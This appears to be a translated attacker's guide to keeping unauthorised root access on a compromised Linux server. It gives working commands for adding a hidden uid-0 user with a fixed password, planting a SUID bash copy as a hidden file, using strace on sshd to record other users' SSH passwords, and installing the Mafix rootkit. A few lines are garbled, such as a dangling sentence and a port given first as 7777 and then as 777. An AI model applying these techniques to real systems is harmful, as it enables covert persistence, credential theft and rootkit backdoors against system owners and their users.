Linux Permission Maintenance Methodology
1. Create super user
For example:
Create a root user with username guest and password 123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
/etc/passwd
It is also possible to create a superuser by modifying :
2. SUID backdoor authority maintenance
Necessary conditions for a SUID backdoor:
- SUID permissions are only valid for binary programs
- The executor must have executable permission for this program
- Permissions are only valid during the execution of the program
- During the execution process, the executor will have the authority of the program owner
step:
- Create a SUID file,
.long
- write bash
cp /bin/bash .long #将bash命令cp到.long二进制程序中
chmod 4755 .long #赋予SUID文件的权限
- Execute this SUID backdoor file
./.long -p
Get a root shell
3.Strace monitors the backdoor
strace can not only monitor and connect others, but also can be used to catch other people's passwords
First we need to find the PID of the sshd process with the following command:
ps -ef | grep sshd
PID is 31171
Then we execute the following code to start grabbing traffic:
strace -f -p 31171 -o .ssh.log -e trace=read,write,connect -s 2048
At this time, any operation we use to log in with ssh or switch users, the password will be recorded in .ssh.log
the file. The disadvantage of this method is that the generated log file is very large, and it is easy to arouse suspicion.
4. rookit backdoor
Mafix is a commonly used lightweight application-level Rootkits. It realizes remote login by forging ssh protocol vulnerabilities. It is characterized by simple configuration and customizable authentication passwords and port numbers.
First download Mafix, upload it to the target server, unzip it and cd to the Mafix directory, and install the rootkit:
./root 111111 7777
Among them, 111111 is the password when you connect to the backdoor program, and 7777 is the connection port
Connection backdoor:
ssh ip -p 777